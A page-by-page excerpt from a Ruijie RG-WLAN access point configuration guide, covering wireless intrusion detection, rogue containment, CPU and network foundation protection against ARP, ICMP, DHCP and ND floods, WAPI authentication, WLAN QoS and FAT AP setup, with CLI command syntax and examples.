  • Page 96 Configuration Guide Configuring WIDS auth: Indicates Authentication packets. deauth: Indicates Deauthentication packets. null-data: Indicates Null packets. num: Indicates the packet threshold of flooding attack detection ranging from 1 to 5,000. time: Indicates the interval of flooding attack detection ranging from 10 to 60 seconds. Defaults All packet thresholds of flooding attack detection, by default, 300 for single-STA, 500 for multi-STA, and 10 seconds of the statistic interval...
  • Page 97 Configuration Guide Configuring WIDS  Weak IV attack detection, detecting the weak IV packet attack.  CMCC DoS attack detection, detecting the DoS attack. Configuration Example 2.4.3 Configuring User Isolation Configuration Effect  After user isolation is configured, direct communication cannot be conducted between STAs meeting the user isolation rules.
  • Page 98 Configuration Guide Configuring WIDS Configuration Example 2.4.4 Configuring Rogue Detection and Containment Configuration Effect Configure Rogue detection and containment provide illegal device suppression and maintain WLAN security. Notes The detection and containment of Rogue devices takes effect only when the AP working mode is Hybrid or Monitor. Configuration Steps ...
  • Page 99 Configuration Guide Configuring WIDS Description config: Indicates Config containment mode, countering devices which meet entries in the SSID blacklist and static attack list. rogue: Indicates Rogue containment mode, countering devices whose RSSI is larger than the threshold. ssid: Indicates SSID containment mode, countering devices with the same SSID but not on the same AC. all: Indicates all the above containment modes.
  • Page 100 Configuration Guide Configuring WIDS Command device permit { mac-address H.H.H | mac-address max num | ssid ssid | max-ssid num | vendor bssid H.H.H | vendor bssid max num } Parameter mac-address H.H.H: Indicates the permissible MAC list entry, null by default. Description mac-address max num: Indicates the permissible MAC list length, ranging from 1 to 2,048, 1,024 by default.
  • Page 101 Configuration Guide Configuring WIDS Command device friendly-flagsvalue value: Indicates the device friendly flag, ranging from 1 to 4294967295. Parameter Description Defaults The default value is 0. Command WIDS configuration mode Mode Usage Guide The containment function has no effect when the AP operates in Normal mode. ...
  • Page 102 Configuration Guide Configuring WIDS Description mac-address H.H.H: Configures the unknown STA list entry, empty by default. mac-address max num: Configures the unknown STA list length, ranging from 1 to 256. Defaults Unknown STA detection and containment is disabled. Command WIDS configuration mode Mode Usage Guide The containment function has no effect when the AP operates in Normal mode.
  • Page 103 Configuration Guide Configuring WIDS Description The scanning channel is null. Defaults WIDS configuration mode Command Mode Usage Guide Verification  Run the show wids detected command to display the detected results. Configuration Example 2.4.5 Configuring AP Working Mode Configuration Effect ...
  • Page 104 Configuration Guide Configuring WIDS 2.5 Monitoring Displaying Description Command Displays the attack list configuration. show wids attack-list Displays the dynamic or static blacklist configuration. show wids blacklist { dynamic | static } Displays the SSID-based blacklist configuration. show wids black-ssid show wids detected { adhoc | all | friendly ap Displays the information of detected devices of a specified type.
  • Page 105 Configuration Guide Configuring CPP 3 Configuring CPP 3.1 Overview CPU Protect Policy (CPP) is a CPU protection policy. Malicious attacks are often found in network environment. Network devices are occupied with counterfeited management and protocol packets and have no time to process real management and protocol packets. In this way, the attacks bring destructive impacts on device security and network stability.
  • Page 106 Configuration Guide Configuring CPP All packets that are sent to the AC/AP for protocol processing must be classified (e.g., into ARP, BPDU and d1x) through packet identification (for the data classification of different products, see Configuration ).  Limiting Rate An administrator can configure the rate limit for packets of each type, thus effectively dampening high-rate attack packets on the network.
  • Page 107 Configuration Guide Configuring CPP Notes Configuration Steps  Configuring the Rate limit for Specified Packets  Optional.  Enable the CPP function on all APs unless otherwise specified.  A user can adjust the default rate limit for packets of each type according to actual requirements. Command cpu-protect type { arp | bpdu | capwap-disc | d1x | dhcp-option82 | dhcp-relay-client | dhcp-realy-server | dhcps | igmp | ipmc | ipv6-nans | isis | lldp | ospf | ospfv3 | pim | pppoe | rip | ripng...
  • Page 108 Configuration Guide Configuring CPP Default rate limit for pim: 1000pps. Default rate limit for ripng: 600pps. Command Global configuration mode Mode Usage Guide Verification  Run the show cpu-protect summary command to display the configuration. Configuration Example 3.5 Monitoring Displaying Description Command Displays the rate limit for packets of various types.
  • Page 109 Configuration Guide Configuring NFPP 4 Configuring NFPP 4.1 Overview The Network Foundation Protection Policy (NFPP) provides guard for switches. Some malicious attacks are always found in the network environment. These attacks bring heavy burdens to switches, resulting in high CPU usage and abnormal running on switches. These attacks are as follows: Denial of service (DoS) attacks may greatly consume the memory, entries, or other resources of a switch to cause system service unavailable.
  • Page 110 Configuration Guide Configuring NFPP rate limiting function takes effect based on each type of packets. This section uses ARP packets as an example to describe the scenario. If an attacker sends ARP attack packets while the CPU capability is insufficient, a large number of CPU resources will be consumed for processing these ARP packets.
  • Page 111 Configuration Guide Configuring NFPP In local area networks (LANs), IP addresses are converted to MAC addresses through ARP, which is significant for safeguarding network security. A large number of illegal ARP packets are sent to the gateway through the network, causing failure of the gateway to provide services for normal hosts.
  • Page 112 Configuration Guide Configuring NFPP authorized hosts will fail to request IPv6 addresses and therefore fail to access the network. To prevent this type of attacks, limit the rate of DHCPv6 packets and detect and isolate the attack source.  ND Guard Neighbor Discovery (ND) is mainly used in IPv6 networks to perform address resolution, router discovery, prefix discovery, and redirection.
  • Page 113 Configuration Guide Configuring NFPP - The link-layer source MAC address is fixed but the source IP address changes. - The link-layer source MAC address and source IP address are fixed but the destination IP address continuously changes. Among IP packets beyond the scanning threshold received in the configured period, if the source IP address remains the same while the destination IP address continuously changes, IP scanning attack may have occurred.
  • Page 114 Configuration Guide Configuring NFPP 4.3.5 Configuring Trusted Hosts Configure trusted hosts. Working Principle If you do not want to monitor a host, you can run the following commands to configure the host to be trusted. This trusted host will be allowed to send packets of specified types to the CPU. 4.3.6 Centralized Rate Limiting and Distribution Set the rate thresholds and percentages for Manage, Route and Protocol packets.
  • Page 115 Configuration Guide Configuring NFPP arp-guard enable Enables global attack detection. arp-guard monitor-period Configures the monitoring period. Configures maximum number arp-guard monitored-host-limit monitored hosts. arp-guard rate-limit Configures the global rate limit. Configures the global attack threshold. arp-guard attack-threshold Configures the global host-based scanning arp-guard scan-threshold threshold.
  • Page 116 Configuration Guide Configuring NFPP icmp-guard enable Enables global attack detection. icmp-guard monitor-period Configures the monitoring period. Configures maximum number icmp-guard monitored-host-limit monitored hosts. icmp-guard rate-limit Configures the global rate limit. Configures the global attack threshold. icmp-guard attack-threshold (Optional) It is used to configure ICMP trusted hosts, ICMP isolation and port-based ICMP guard.
  • Page 117 Configuration Guide Configuring NFPP dhcpv6-guard trusted-host Configures trusted hosts. nfpp dhcpv6-guard enable Enables attack detection for a port. Configures rate limit attack nfpp dhcpv6-guard policy threshold for a port. nfpp dhcpv6-guard isolate-period Configures the isolation period for a port. (Mandatory) It is used to configure the global ND guard function. nd-guard enable Enables global attack detection.
  • Page 118 Configuration Guide Configuring NFPP rate exceeds the rate limit, the packets beyond the rate limit are discarded. If the ARP packet rate exceeds the alarm threshold, the system prints alarm information and sends Trap packets. In host-based attack identification, the system also isolates the attack source.
  • Page 119 Configuration Guide Configuring NFPP  If the packet traffic of attackers exceeds the rate limit, you can configure the isolation period to directly discard packets and therefore save bandwidth resources.  Support the global configuration mode or interface configuration mode on the AP device. ...
  • Page 120 Configuration Guide Configuring NFPP  Configure the maximum number of monitored hosts. As the number of actually monitored hosts increases, more CPU resources are used to handle monitored hosts.  Support the global configuration mode on the AP device.  If the number of monitored hosts exceeds 1000 (default value), the administrator can set the maximum number of monitored hosts to a value smaller than 1000.
  • Page 121 Configuration Guide Configuring NFPP  In NFPP configuration mode: run the arp-guard attack-threshold {per-src-ip | per-src-mac} pps command to configure attack thresholds of hosts identified based on the source IP address, VLAN ID, and port and of hosts identified based on the link-layer source MAC address, VLAN ID, and port. ...
  • Page 122 Configuration Guide Configuring NFPP Defaults By default, no rate limit and attack threshed are configured for a port, and the global rate limit and attack threshold are used. Command Interface configuration mode Mode Usage Guide The attack threshold must be equal to or greater than the rate limit. ...
  • Page 123 Configuration Guide Configuring NFPP  If any entry matching a trusted host (the IP addresses and MAC addresses are the same) exists in the table of monitored hosts, the system automatically deletes this entry.  If the table of trusted hosts is full, the system prints the log "%ERROR: Attempt to exceed limit of 500 trusted hosts." to notify the administrator.
  • Page 124 Configuration Guide Configuring NFPP  Configure trusted hosts. Ruijie# configure terminal Ruijie(config)# nfpp Ruijie (config-nfpp)#arp-guard rate-limit per-src-mac 5 Ruijie (config-nfpp)#arp-guard attack-threshold per-src-mac 10 Ruijie (config-nfpp)#arp-guard isolate-period 180 Ruijie (config-nfpp)#arp-guard trusted-host 1.1.1.1 0000.0000.1111  Verification Run the show nfpp arp-guard summary command to display the configurations.
  • Page 125 Configuration Guide Configuring NFPP the alarm threshold, the system prints alarm information and sends Trap packets. In host-based attack identification, the system also isolates the attack source.  IP guard can also detect IP scanning attacks. IP anti-scanning applies to IP packet attacks as follows: the destination IP address continuously changes but the source IP address remains the same, and the destination IP address is not the IP address of the local device.
  • Page 126 Configuration Guide Configuring NFPP  If the packet traffic of attackers exceeds the rate limit of the CPP, you can configure the isolation period to directly discard packets and therefore save bandwidth resources.  Support the global configuration mode or interface configuration mode on the AP device. ...
  • Page 127 Configuration Guide Configuring NFPP  Mandatory.  Increase the maximum number of monitored hosts. As the number of actually monitored hosts increases, more CPU resources are used to handle monitored hosts.  Support the global configuration mode on the AP device. ...
  • Page 128 Configuration Guide Configuring NFPP Parameter per-src-ip: Limits the rate for each source IP address. Description per-port: Limits the rate for each port. pps: Indicates the rate limit, ranging from 1 to 9,999. Defaults See the product feature document. Command NFPP configuration mode Mode Usage Guide Command...
  • Page 129 Configuration Guide Configuring NFPP Command NFPP configuration mode Mode Usage Guide Command nfpp ip-guard scan-threshold pkt-cnt Parameter pkt-cnt: Indicates the scanning threshold, ranging from 1 to 9,999. Description Defaults By default, no port-based IP scanning threshold is configured and the global IP scanning threshold is used. Command Interface configuration mode Mode...
  • Page 130  Set the isolation period to a non-zero value.  Configure trusted hosts. Ruijie# configure terminal Ruijie(config)# nfpp Ruijie (config-nfpp)#ip-guard rate-limit per-src-ip 20 Ruijie (config-nfpp)#ip-guard attack-threshold per-src-ip 30 Ruijie (config-nfpp)#ip-guard isolate-period 180 Ruijie (config-nfpp)#ip-guard trusted-host 192.168.201.46 255.255.255.255  Verification Run the show nfpp ip-guard summary command to display the configurations.
  • Page 131 Configuration Guide Configuring NFPP IP address mask ---------- ---- 192.168.201.46 255.255.255.255 Total: 1 record(s) 4.4.3 Configuring ICMP Guard Configuration Effect  ICMP attacks are identified based on hosts or ports. In host-based attack identification, ICMP attacks are identified based on the source IP address, VLAN ID, and port. Each type of attack identification has a rate limit and an alarm threshold.
  • Page 132 Configuration Guide Configuring NFPP  Configuring the Isolation Period  (Optional) Isolation is disabled by default.  If the packet traffic of attackers exceeds the rate limit of the CPP, you can configure the isolation period to directly discard packets and therefore save bandwidth resources. ...
  • Page 133 Configuration Guide Configuring NFPP Usage Guide If the isolation period is 0, the system performs software monitoring on detected attackers. The timeout period is the monitoring period. During software monitoring, if the isolation period is set to a non-zero value, the system automatically performs isolation against attackers monitored by software and sets the timeout period as the monitoring period.
  • Page 134 Configuration Guide Configuring NFPP  If the configured attack threshold is smaller than the rate limit, the system prints the log "%ERROR: attack threshold is smaller than rate limit 300pps." to notify the administrator.  memory cannot allocated detected attackers, system prints "%NFPP_ICMP_GUARD-4-NO_MEMORY: Failed to alloc memory."...
  • Page 135 Configuration Guide Configuring NFPP Mode Usage Guide The attack threshold must be equal to or greater than the rate limit.  Configuring Trusted Hosts  (Optional) No trusted host is configured by default.  For ICMP anti-scanning, you can configure a maximum of 500 IP addresses not to be monitored. ...
  • Page 136 Steps Set the isolation period to a non-zero value.  Configure trusted hosts. Ruijie# configure terminal Ruijie(config)# nfpp Ruijie (config-nfpp)#icmp-guard rate-limit per-src-ip 20 Ruijie (config-nfpp)#icmp-guard attack-threshold per-src-ip 30 Ruijie (config-nfpp)#icmp-guard isolate-period 180 Ruijie (config-nfpp)#icmp-guard trusted-host 192.168.201.46 255.255.255.255  Verification Run the show nfpp icmp-guard summary command to display the configurations.
  • Page 137 Configuration Guide Configuring NFPP DHCP packet rate exceeds the alarm threshold, the system prints alarm information and sends Trap packets. In host-based attack identification, the system also isolates the attack source. Notes  For a command that is configured both in global configuration mode and interface configuration mode, the configuration in interface configuration mode takes priority over that configured in global configuration mode.
  • Page 138 Configuration Guide Configuring NFPP Parameter seconds: Indicates the isolation period in the unit of second. It can be set to 0 or any value from 30 to Description 86,400. The value 0 indicates no isolation. permanent: Indicates permanent isolation. Defaults The default global isolation period is 0, that is, no isolation.
  • Page 139 Configuration Guide Configuring NFPP  Increase the maximum number of monitored hosts. As the number of actually monitored hosts increases, more CPU resources are used to handle monitored hosts.  Support the global configuration mode on the AP device.  If the number of monitored hosts exceeds 1000 (default value), the administrator can set the maximum number of monitored hosts to a value smaller than 1000.
  • Page 140 Configuration Guide Configuring NFPP  In NFPP configuration mode: run the dhcp-guard attack-threshold { per-src-mac | per-port } pps command to configure the global attack threshold. That is, when the packet rate exceeds the attack threshold, it is considered that attack behaviors exist.
  • Page 141 DHCP packet traffic of some hosts is very large in the system, and these packets need to pass through.  Configuration Configure the host-based attack threshold.  Steps Set the isolation period to a non-zero value.  Configure trusted hosts. Ruijie# configure terminal Ruijie(config)# nfpp...
  • Page 142 Configuration Guide Configuring NFPP Ruijie (config-nfpp)#dhcp-guard rate-limit per-src-mac 8 Ruijie (config-nfpp)#dhcp-guard attack-threshold per-src-mac 16 Ruijie (config-nfpp)#dhcp-guard isolate-period 180 Ruijie (config-nfpp)#dhcp-guard trusted-host 0000.0000.1111  Verification Run the show nfpp dhcp-guard summary command to display the configurations. (Format of column Rate-limit and Attack-threshold is per-src-ip/per-src-mac/per-port.)
  • Page 143 Configuration Guide Configuring NFPP Configuration Steps  Enabling Attack Detection  (Mandatory) Attack detection is enabled by default.  Support the global configuration mode or interface configuration mode on the AP device.  If DHCPv6 guard is disabled, the system automatically clears monitored hosts. Command dhcpv6-guard enable Parameter...
  • Page 144 Configuration Guide Configuring NFPP isolation period). For a port, if the port-based isolation period is not configured, the global isolation period is used; otherwise, the port-based isolation period is used. Command nfpp dhcpv6-guard isolate-period [ seconds | permanent ] Parameter seconds: Indicates the isolation period in the unit of second.
  • Page 145 Configuration Guide Configuring NFPP of monitored hosts." This information notifies the administrator that the configuration does not take effect and that part of monitored hosts need to be deleted.  If the table of monitored hosts is full, the system prints the log "% NFPP_DHCPV6_GUARD-4-SESSION_LIMIT: Attempt to exceed limit of 1000 monitored hosts."...
  • Page 146 Configuration Guide Configuring NFPP Description per-port: Limits the rate for each port. pps: Indicates the rate limit, ranging from 1 to 9,999. Defaults The default rate limit for each source MAC address is 5 pps. The default rate limit for each port is 150 pps. Command NFPP configuration mode Mode...
  • Page 147 Steps Set the isolation period to a non-zero value.  Configure trusted hosts. Ruijie# configure terminal Ruijie(config)# nfpp Ruijie (config-nfpp)#dhcpv6-guard rate-limit per-src-mac 8 Ruijie (config-nfpp)#dhcpv6-guard attack-threshold per-src-mac 16 Ruijie (config-nfpp)#dhcpv6-guard isolate-period 180 Ruijie (config-nfpp)#dhcpv6-guard trusted-host 0000.0000.1111  Verification Run the show nfpp dhcpv6-guard summary command to display the configurations.
  • Page 148 Configuration Guide Configuring NFPP Interface Status Isolate-period Rate-limit Attack-threshold Global Disable 180 -/8/150 -/16/300 Maximum count of monitored hosts: 1000 Monitor period: 600s  Run the show nfpp dhcpv6-guard hosts command to display monitored hosts. If col_filter 1 shows '*', it means "hardware do not isolate host". VLAN interface MAC address...
  • Page 149 Configuration Guide Configuring NFPP Parameter Description Defaults ND guard is enabled by default. Command NFPP configuration mode Mode Usage Guide Command nfpp nd-guard enable Parameter Description Defaults ND guard is configured in global configuration mode, but not in interface configuration mode. Command Interface configuration mode Mode...
  • Page 150 Configuration Guide Configuring NFPP default rate limit for RAs and Redirect packets is 15 pps. Command NFPP configuration mode Mode Usage Guide Command nd-guard attack-threshold per-port [ ns-na | rs | ra-redirect ] pps Parameter ns-na: Indicates NSs and NAs. Description rs: Indicates RSs.
  • Page 151 ND packet traffic of some hosts is very large in the system, and these packets need to pass through.  Configuration Configure the host-based attack threshold. Steps Ruijie# configure terminal Ruijie(config)# nfpp Ruijie (config-nfpp)# nd-guard rate-limit per-port ns-na 30 Ruijie (config-nfpp)# nd-guard attack-threshold per-port ns-na 50 Ruijie (config-nfpp)#nd-guard trusted-host 0000.0000.1111...
  • Page 152 Configuration Guide Configuring NFPP  Verification Run the show nfpp nd-guard summary command to display the configurations. (Format of column Rate-limit and Attack-threshold is NS-NA/RS/RA-REDIRECT.) Interface Status Rate-limit Attack-threshold Global Disable 30/15/15  Run the show nfpp nd-guard trusted-host command to display trusted hosts. ---- 0000.0000.1111 Total: 1 record(s)
  • Page 153 Configure the maximum bandwidth for each type of packets.  Steps Configure the maximum percentage of each type of packets in the queue. Ruijie# configure terminal Ruijie(config)# cpu-protect sub-interface manage pps 5000 Ruijie(config)# cpu-protect sub-interface manage percent 25 Verification Omitted. 4.4.8 Configuring NFPP Log Information...
  • Page 154 Configuration Guide Configuring NFPP  Support the global configuration mode on the AP device. Command log-buffer entries number Parameter number: Indicates the buffer size in unit of the number of logs, ranging from 0 to 1024. Description Defaults The default buffer size is 256. Command NFPP configuration mode Mode...
  • Page 155  Configure VLAN-based log filtering. Ruijie# configure terminal Ruijie(config)# nfpp Ruijie (config-nfpp)#log-buffer entries 1024 Ruijie (config-nfpp)#log-buffer logs 3 interval 5 Ruijie (config-nfpp)#logging interface vlan 1  Verification Run the show nfpp logsummary command to display the configurations. Total log buffer size : 1024...
  • Page 156 Configuration Guide Configuring NFPP 4.5 Monitoring Clearing Description Command Clears the ARP guard scanning clear nfpp arp-guard scan table. Clears monitored hosts in ARP clear nfpp arp-guard hosts guard. Clears monitored hosts in IP guard. clear nfpp ip-guard hosts Clears monitored hosts in IMCP clear nfpp icmp-guard hosts guard.
  • Page 157 Configuration Guide Configuring NFPP Displays trusted hosts in DHCP show nfpp dhcp-guard trusted-host guard. Displays configuration parameters of show nfpp dhcpv6-guard summary DHCPv6 guard. Displays monitored hosts in DHCPv6 show nfpp dhcpv6-guard hosts guard. Displays trusted hosts in DHCPv6 show nfpp dhcpv6-guard trusted-host guard.
  • Page 158 Configuration Guide Configuring WAPI 5 Configuring WAPI 5.1 Overview WLAN Authentication and Privacy Infrastructure (WAPI) is a wireless network security standard for which China has the proprietary intellectual property rights. WAPI comprises two parts:  WLAN Authentication Infrastructure (WAI): a security solution used for identification and key management in a WLAN. WAPI provides two authentication approaches: WAPI pre-shared key authentication and WAPI certificate authentication.
  • Page 159 Configuration Guide Configuring WAPI  Authentication Server: The AS provides the WAPI certificate authentication service.  Authentication Service Unit: An entity that provides mutual authentication service for the AE and ASUE. This entity resides in the AS.  ASUE Authentication Supplicant Entity: An entity that requests authentication before accessing a service. This entity resides in the STA.
  • Page 160 Configuration Guide Configuring WAPI authentication mode. If the certificate issuing system and certificate authentication system are the same entity, this mode is called WAPI two-certificate authentication mode.  Pre-shared Key Authentication Pre-shared key authentication refers to authentication based on the keys of an STA and an AE. Before authentication, the STA and AE must be configured with the same key, namely, a pre-shared key.
  • Page 161 Configuration Guide Configuring WAPI 5.4 Configuration Configuration Description and Command (Mandatory) It is used to enable the WAPI certification authentication approach. security wapi Configures and enables the WAPI security mode Configures the WAPI certificate of the AE equipment security wapi ae cert security wapi asu address Configures the IP address of the authentication server security wapi ca cert...
  • Page 162 Configuration Guide Configuring WAPI Configuration Steps  Enabling the WAPI Security Mode  Mandatory.  It is configured in the WLAN security configuration mode on the AP. Command security wapi { enable | disable } Parameter enable: Enables the WAPI security mode. Description disable: Disables the WAPI security mode.
  • Page 163 Configuration Guide Configuring WAPI same time. After the WAPI three-certificate authentication mode is configured, the STA accesses the WLAN by using the three-certificate authentication mode. Command security wapi 3-cert { enable | disable } Parameter enable: Enables the WAPI three-certificate authentication. Description disable: Disables the WAPI three-certificate authentication.
  • Page 164 Configuration Guide Configuring WAPI Command security wapi asu cert asu_certfile asu_certfile: Specifies the ASU certificate file name. Parameter Description Defaults Command WLAN security configuration mode Mode Usage Guide Before configuring the ASU certificate, enable the WAPI security mode. Before configuration, ensure that the certificate file is imported into the AE and ASUE. The ASU certificate must be configured for the three-certificate authentication mode.
  • Page 165 Configuration Guide Configuring WAPI Notes  After the WAPI pre-shared key authentication mode is enabled, a pre-shared key must be configured. Configuring WAPI security mode and displaying WAPI configuration and state are not supported on AP110-W, or AP120-W. Configuration Steps ...
  • Page 166 Configuration Guide Configuring WAPI Parameter ascii: Specifies that the pre-shared key is in the ASCII format. Description ascii-key: Specifies a key consisting of 8-32 ASCII characters. hex: Specifies that the pre-shared key is in the hexadecimal format. hex-key: Specifies a key consisting of 16-64 hexadecimal characters. The length must be an even number. Defaults Command WLAN security configuration mode...
  • Page 167 RG-WLAN Series Access Point RGOS Configuration Guide, Release 11.1(5)B8 WLAN QoS Configuration 1 Configuring WLAN QoS...
  • Page 168 Configuration Guide Configuring WQoS 1 Configuring WQoS 1.1 Overview WLAN QoS (WQoS) is a wireless bandwidth control technology. It involves rate limiting and fair scheduling. Rate limiting is used to limit the traffic of access points (APs), WLAN, or STAs, thus preventing the traffic from exceeding a specified range.

  • Page 169: Rate Limiting

    Configuration Guide Configuring WQoS Fair scheduling allows STAs in the same frequency band of the same AP to share the wireless network resources provided by the AP fairly. The fair scheduling function can prevent low-speed STAs from decreasing the throughput of the entire wireless network, and provide smoother network experience for STAs.
  • Page 170 Configuration Guide Configuring WQoS In the real wireless scenarios, STAs often differ in types and performance. Consequently, some STAs always cannot obtain the resources, or get super slow response. What is worse, these STAs cannot access the network, which seriously affects user experience.
  • Page 171 Configuration Guide Configuring WQoS  Mandatory.  On a fat AP, run the wlan-qos ap-based command in global configuration mode to configure AP-based rate limiting. Command wlan qos ap-based { per-user-limit | total-user-limit } { down-streams | up-streams } average-data-rate average-data-rate burst-data-rate burst-data-rate wlan-qos ap-based total-user-limit { down-streams | up-streams } intelligent Parameter...
  • Page 172 Configuration Guide Configuring WQoS wlan-qos wlan-based { wlan-id | ssid } total-user-limit { down-streams | up-streams } intelligent Parameter per-user-limit: Indicates that rate limiting is implemented on every STA on the WLAN. Description total-user-limit: Indicates that rate limiting is implemented on all STAs on the WLAN. intelligent: Indicates whether rate limiting is implemented on all STAs on the WLAN intelligently.
  • Page 173 Configuration Guide Configuring WQoS Mode Usage Guide  Configuring the Fair Scheduling Priority  (Optional) Perform this configuration if you need to change the fair scheduling priority of a STA.  On a fat AP, run the sta-fair command in global configuration mode to configure the fair scheduling priority. Command sta-fair mac-address priority priority mac-address: Indicates the MAC address of a STA.
  • Page 175 RG-WLAN Series Access Point RGOS Configuration Guide, Release 11.1(5)B8 WLAN Networking Configuration 1 Configuring Fat APs 2 Configuring WDS...
  • Page 176 Configuration Guide Configuring FAT APs 1 Configuring FAT APs 1.1 Overview An Access Point (AP) is wireless equipment used to control and manage wireless clients. When frames are transmitted between wireless clients and a LAN, wireless-to-wired and wired-to-wireless transitions are implemented, during which an AP plays the role of a bridge.

  • Page 177: Configuring Multiple Esss

    Configuration Guide Configuring FAT APs  Client1 and Client2 can access each other and access hosts in the network. Figure 1-1 Radio1 is the first RF interface of the FAT AP. Remarks Client1 and Client2 are wireless clients. The FAT AP, Client1 and Client2 comprise BSS1 and BSS1 belongs to ESS1. Deployment ...
  • Page 178 Configuration Guide Configuring FAT APs Figure 1-2 Radio1 is the first RF interface of the FAT AP. Client1 and Client2 are wireless clients. Remarks The FAT AP and Client1 comprise BSS1 and BSS1 belongs to ESS1. The FAT AP and Client2 comprise BSS2 and BSS2 belongs to ESS2. Deployment ...
  • Page 179 Configuration Guide Configuring FAT APs Radio1 is the first RF interface of the FAT AP. Radio2 is the second RF interface of the FAT AP. Remarks Client1 and Client2 are wireless clients. The FAT AP and Client1 comprise BSS1 and BSS1 belongs to ESS1. The FAT AP and Client2 comprise BSS2 and BSS2 belongs to ESS1.
  • Page 180 Configuration Guide Configuring FAT APs Access Category (AC): An AC is the label of a universal EDCA parameter set. Different ACs have different priorities for accessing media due to different EDCA parameters.  Access Point (AP): An AP is used for wireless terminals to access a wired network, which is the communication bridge between the wireless terminals and wired network.
  • Page 181 Configuration Guide Configuring FAT APs Working Principle  Planning WLAN Subnets In a wireless network, users can divide the network into multiple WLAN subnets by creating WLANs and specify the functions and attributes of the WLANs in the WLAN configuration mode, thus providing different network services for wireless users. ...
  • Page 182 Configuration Guide Configuring FAT APs  Configuring the DTIM Period Delivery Traffic indication Map (DTIM) is a flag bit in a beacon frame, which indicates the interval at which an AP sends broadcast frames or multicast frames. When a wireless terminal is in the sleep mode, the AP automatically caches the data received within the DTIM interval.
  • Page 183 Configuration Guide Configuring FAT APs This standard operates both at 2.4 GHz and 5 GHz bands, and provides the highest data transmission rate of 600 Mbit/s. Devices supporting 802.11n are backward-compatible with 802.11a/b/g.  The RF rate of 802.11n is configured through the index of Modulation and Coding Scheme (MCS). The MCS table is a representation form in which 802.11n expresses the communication rate of a WLAN.
  • Page 184 Configuration Guide Configuring FAT APs  RTS/CTS To avoid signal conflict that causes data transmission failure, the IEEE 802.11 MAC protocol provides the Request To Send/Clear To Send (RTS/CTS) handshake protocol. Assuming that STA A needs to send data to STA B, STA A first sends an RTS frame to STA B.
  • Page 185 Configuration Guide Configuring FAT APs A country code is used to identify a country where radio frequencies reside. The bands, channels, and power vary with country codes. Before configuring an AP, it is required to specify the country code supported by this AP. If the configured country code changes, the corresponding bands, channels and power also change.
  • Page 186 Configuration Guide Configuring FAT APs  STBC Space Time Block Coding (STBC) is a coding technique in wireless communication that improves data transmission reliability by using time and space diversities when multiple duplicates of data are transmitted at different moments and through different antennas.
  • Page 187 Configuration Guide Configuring FAT APs Working Principle  autowifi Configuration on an AP: (1) VLAN planning: VLAN 10 is used as the VLAN for STAs on the AP. (2) Address pool: The 192.168.110.0 segment is used as the STA address pool on a FAT AP. The IP address of bvi 1 is 192.168.110.1.
  • Page 188 Configuration Guide Configuring FAT APs rate-set 11b Configures the 11b rate set. rate-set 11g Configures the 11g rate set. rate-set 11n Configures the 11n rate set. rate-set 11ac Configures the 11ac rate set. Configures the multicast rate. mcast-rate power local Configures the transmit power.
  • Page 189 Configuration Guide Configuring FAT APs (Optional) It is used to set e-bag parameters. Configures the number of AMPDU software ampdu-retries re-transmission times. Configures whether to enable the RTS ampdu-rts protection for AMPDU aggregation packets. Configuring E-bag Configures the number of Ethernet packets Parameters eth-schd that can be received by an AP at a time.
  • Page 190 Configuration Guide Configuring FAT APs Usage Guide  Configuring an SSID  For a FAT-AP to provide WLAN service, you must configure an SSID. Run the ssid command to configure the SSID of a specified WLAN.  If there are no special requirements, you can perform this configuration in the WLAN global configuration mode of the AP equipment.
  • Page 191 Configure the SSID of WLAN 1 to fat_ap on the AP.  Enable broadcasting of the SSID of WLAN 1 on the AP.  Configure the multicast rate of WLAN 1 to 6 Mbit/s on the AP. FAT AP Ruijie#config Ruijie(config)#dot11 wlan 1 Ruijie(dot11-wlan-config)#ssid fat_ap Ruijie(dot11-wlan-config)#broadcast-ssid Ruijie(dot11-wlan-config)#mcast-rate 6...
  • Page 192 Configuring FAT APs Verification After the user configures a WLAN, verify the WLAN based on displayed WLAN configurations.  Run the show running-config command to verify the configurations of a WLAN. Ruijie#show running-config dot11 wlan 1 mcast-rate 6 broadcast-ssid ssid fat_ap Common Errors 1.4.2 Configuring a dot11radio Subinterface...
  • Page 193 Configuration Guide Configuring FAT APs  For a FAT-AP to forward data normally, you must configure the VLAN attributes encapsulated by the dot11radio subinterface. Otherwise, STAs may not communicate normally even though they can access the VLAN. Run the encapsulation dot1Q command to configure the VLAN attributes of the specified dot11radio subinterface. ...

  • Page 194: Ruijie(Config)#Interface Dot11Radio

    Configure the VLAN ID encapsulated by dot11radio 1/0.1 to 1 on the AP equipment.  Map WLAN 1 to dot11radio 1/0.1 on the AP equipment. FAT AP Ruijie#config Ruijie(config)#interface dot11radio 1/0.1 Ruijie(config-subif)#encapsulation dot1Q 1 Ruijie(config-subif)#wlan-id 1 Verification After configuring the dot11radio subinterface, you can verify the dot11radio subinterface based on displayed dot11radio subinterface configurations.
  • Page 195 Configuration Guide Configuring FAT APs Notes  FAT APs support this configuration. Configuration Steps  Configuring the DTIM Period  (Optional) Run the beacon dtim-period command to configure the DTIM period. The value ranges from 1 to 255.  If there are no special requirementsIf there are no special requirements, you can perform this configuration in the dot11radio interface configuration mode of the AP equipment.
  • Page 196 Configuration Guide Configuring FAT APs Command ampdu { enable | disable } Parameter enable: enables the A-MPDU aggregation mode. Description disable: disables the A-MPDU aggregation mode. Defaults The A-MPDU aggregation mode is enabled. Command dot11radio interface configuration mode Mode Usage Guide ...
  • Page 197 Configuration Guide Configuring FAT APs  If there are no special requirementsIf there are no special requirements, you can perform this configuration in the dot11radio interface configuration mode of the AP equipment.  Disabling a rate makes this rate unavailable. Disabling all rates makes 11g STAs fail in access. Command rate-set 11g { mandatory | support | disable speed } Parameter...
  • Page 198 Configuration Guide Configuring FAT APs Usage Guide  Configure the Multicast Rate  Optional.  If there are no special requirements, you can perform this configuration in the dot11radio interface configuration mode of the AP equipment.  The higher the multicast rate, the higher the rate for transmitting multicast packets, the shorter the time for occupying channels, the higher the utilization of channels, but the lower the transmit success ratio when the channel quality is poor.
  • Page 199 Configuration Guide Configuring FAT APs Command sta-limit client-num Parameter client-num: indicates the STA quantity, ranging from 1 to 128. Description Defaults The STA quantity based on an RF interface is limited to 32. Command dot11radio interface configuration mode Mode Usage Guide ...
  • Page 200 Configuration Guide Configuring FAT APs  If there are no special requirementsIf there are no special requirements, you can perform this configuration in the dot11radio interface configuration mode of the AP equipment.  If 11g is supported, 11g STAs can be accessed; otherwise, 11g STAs cannot be accessed. Command 11gsupport enable no 11gsupport enable...
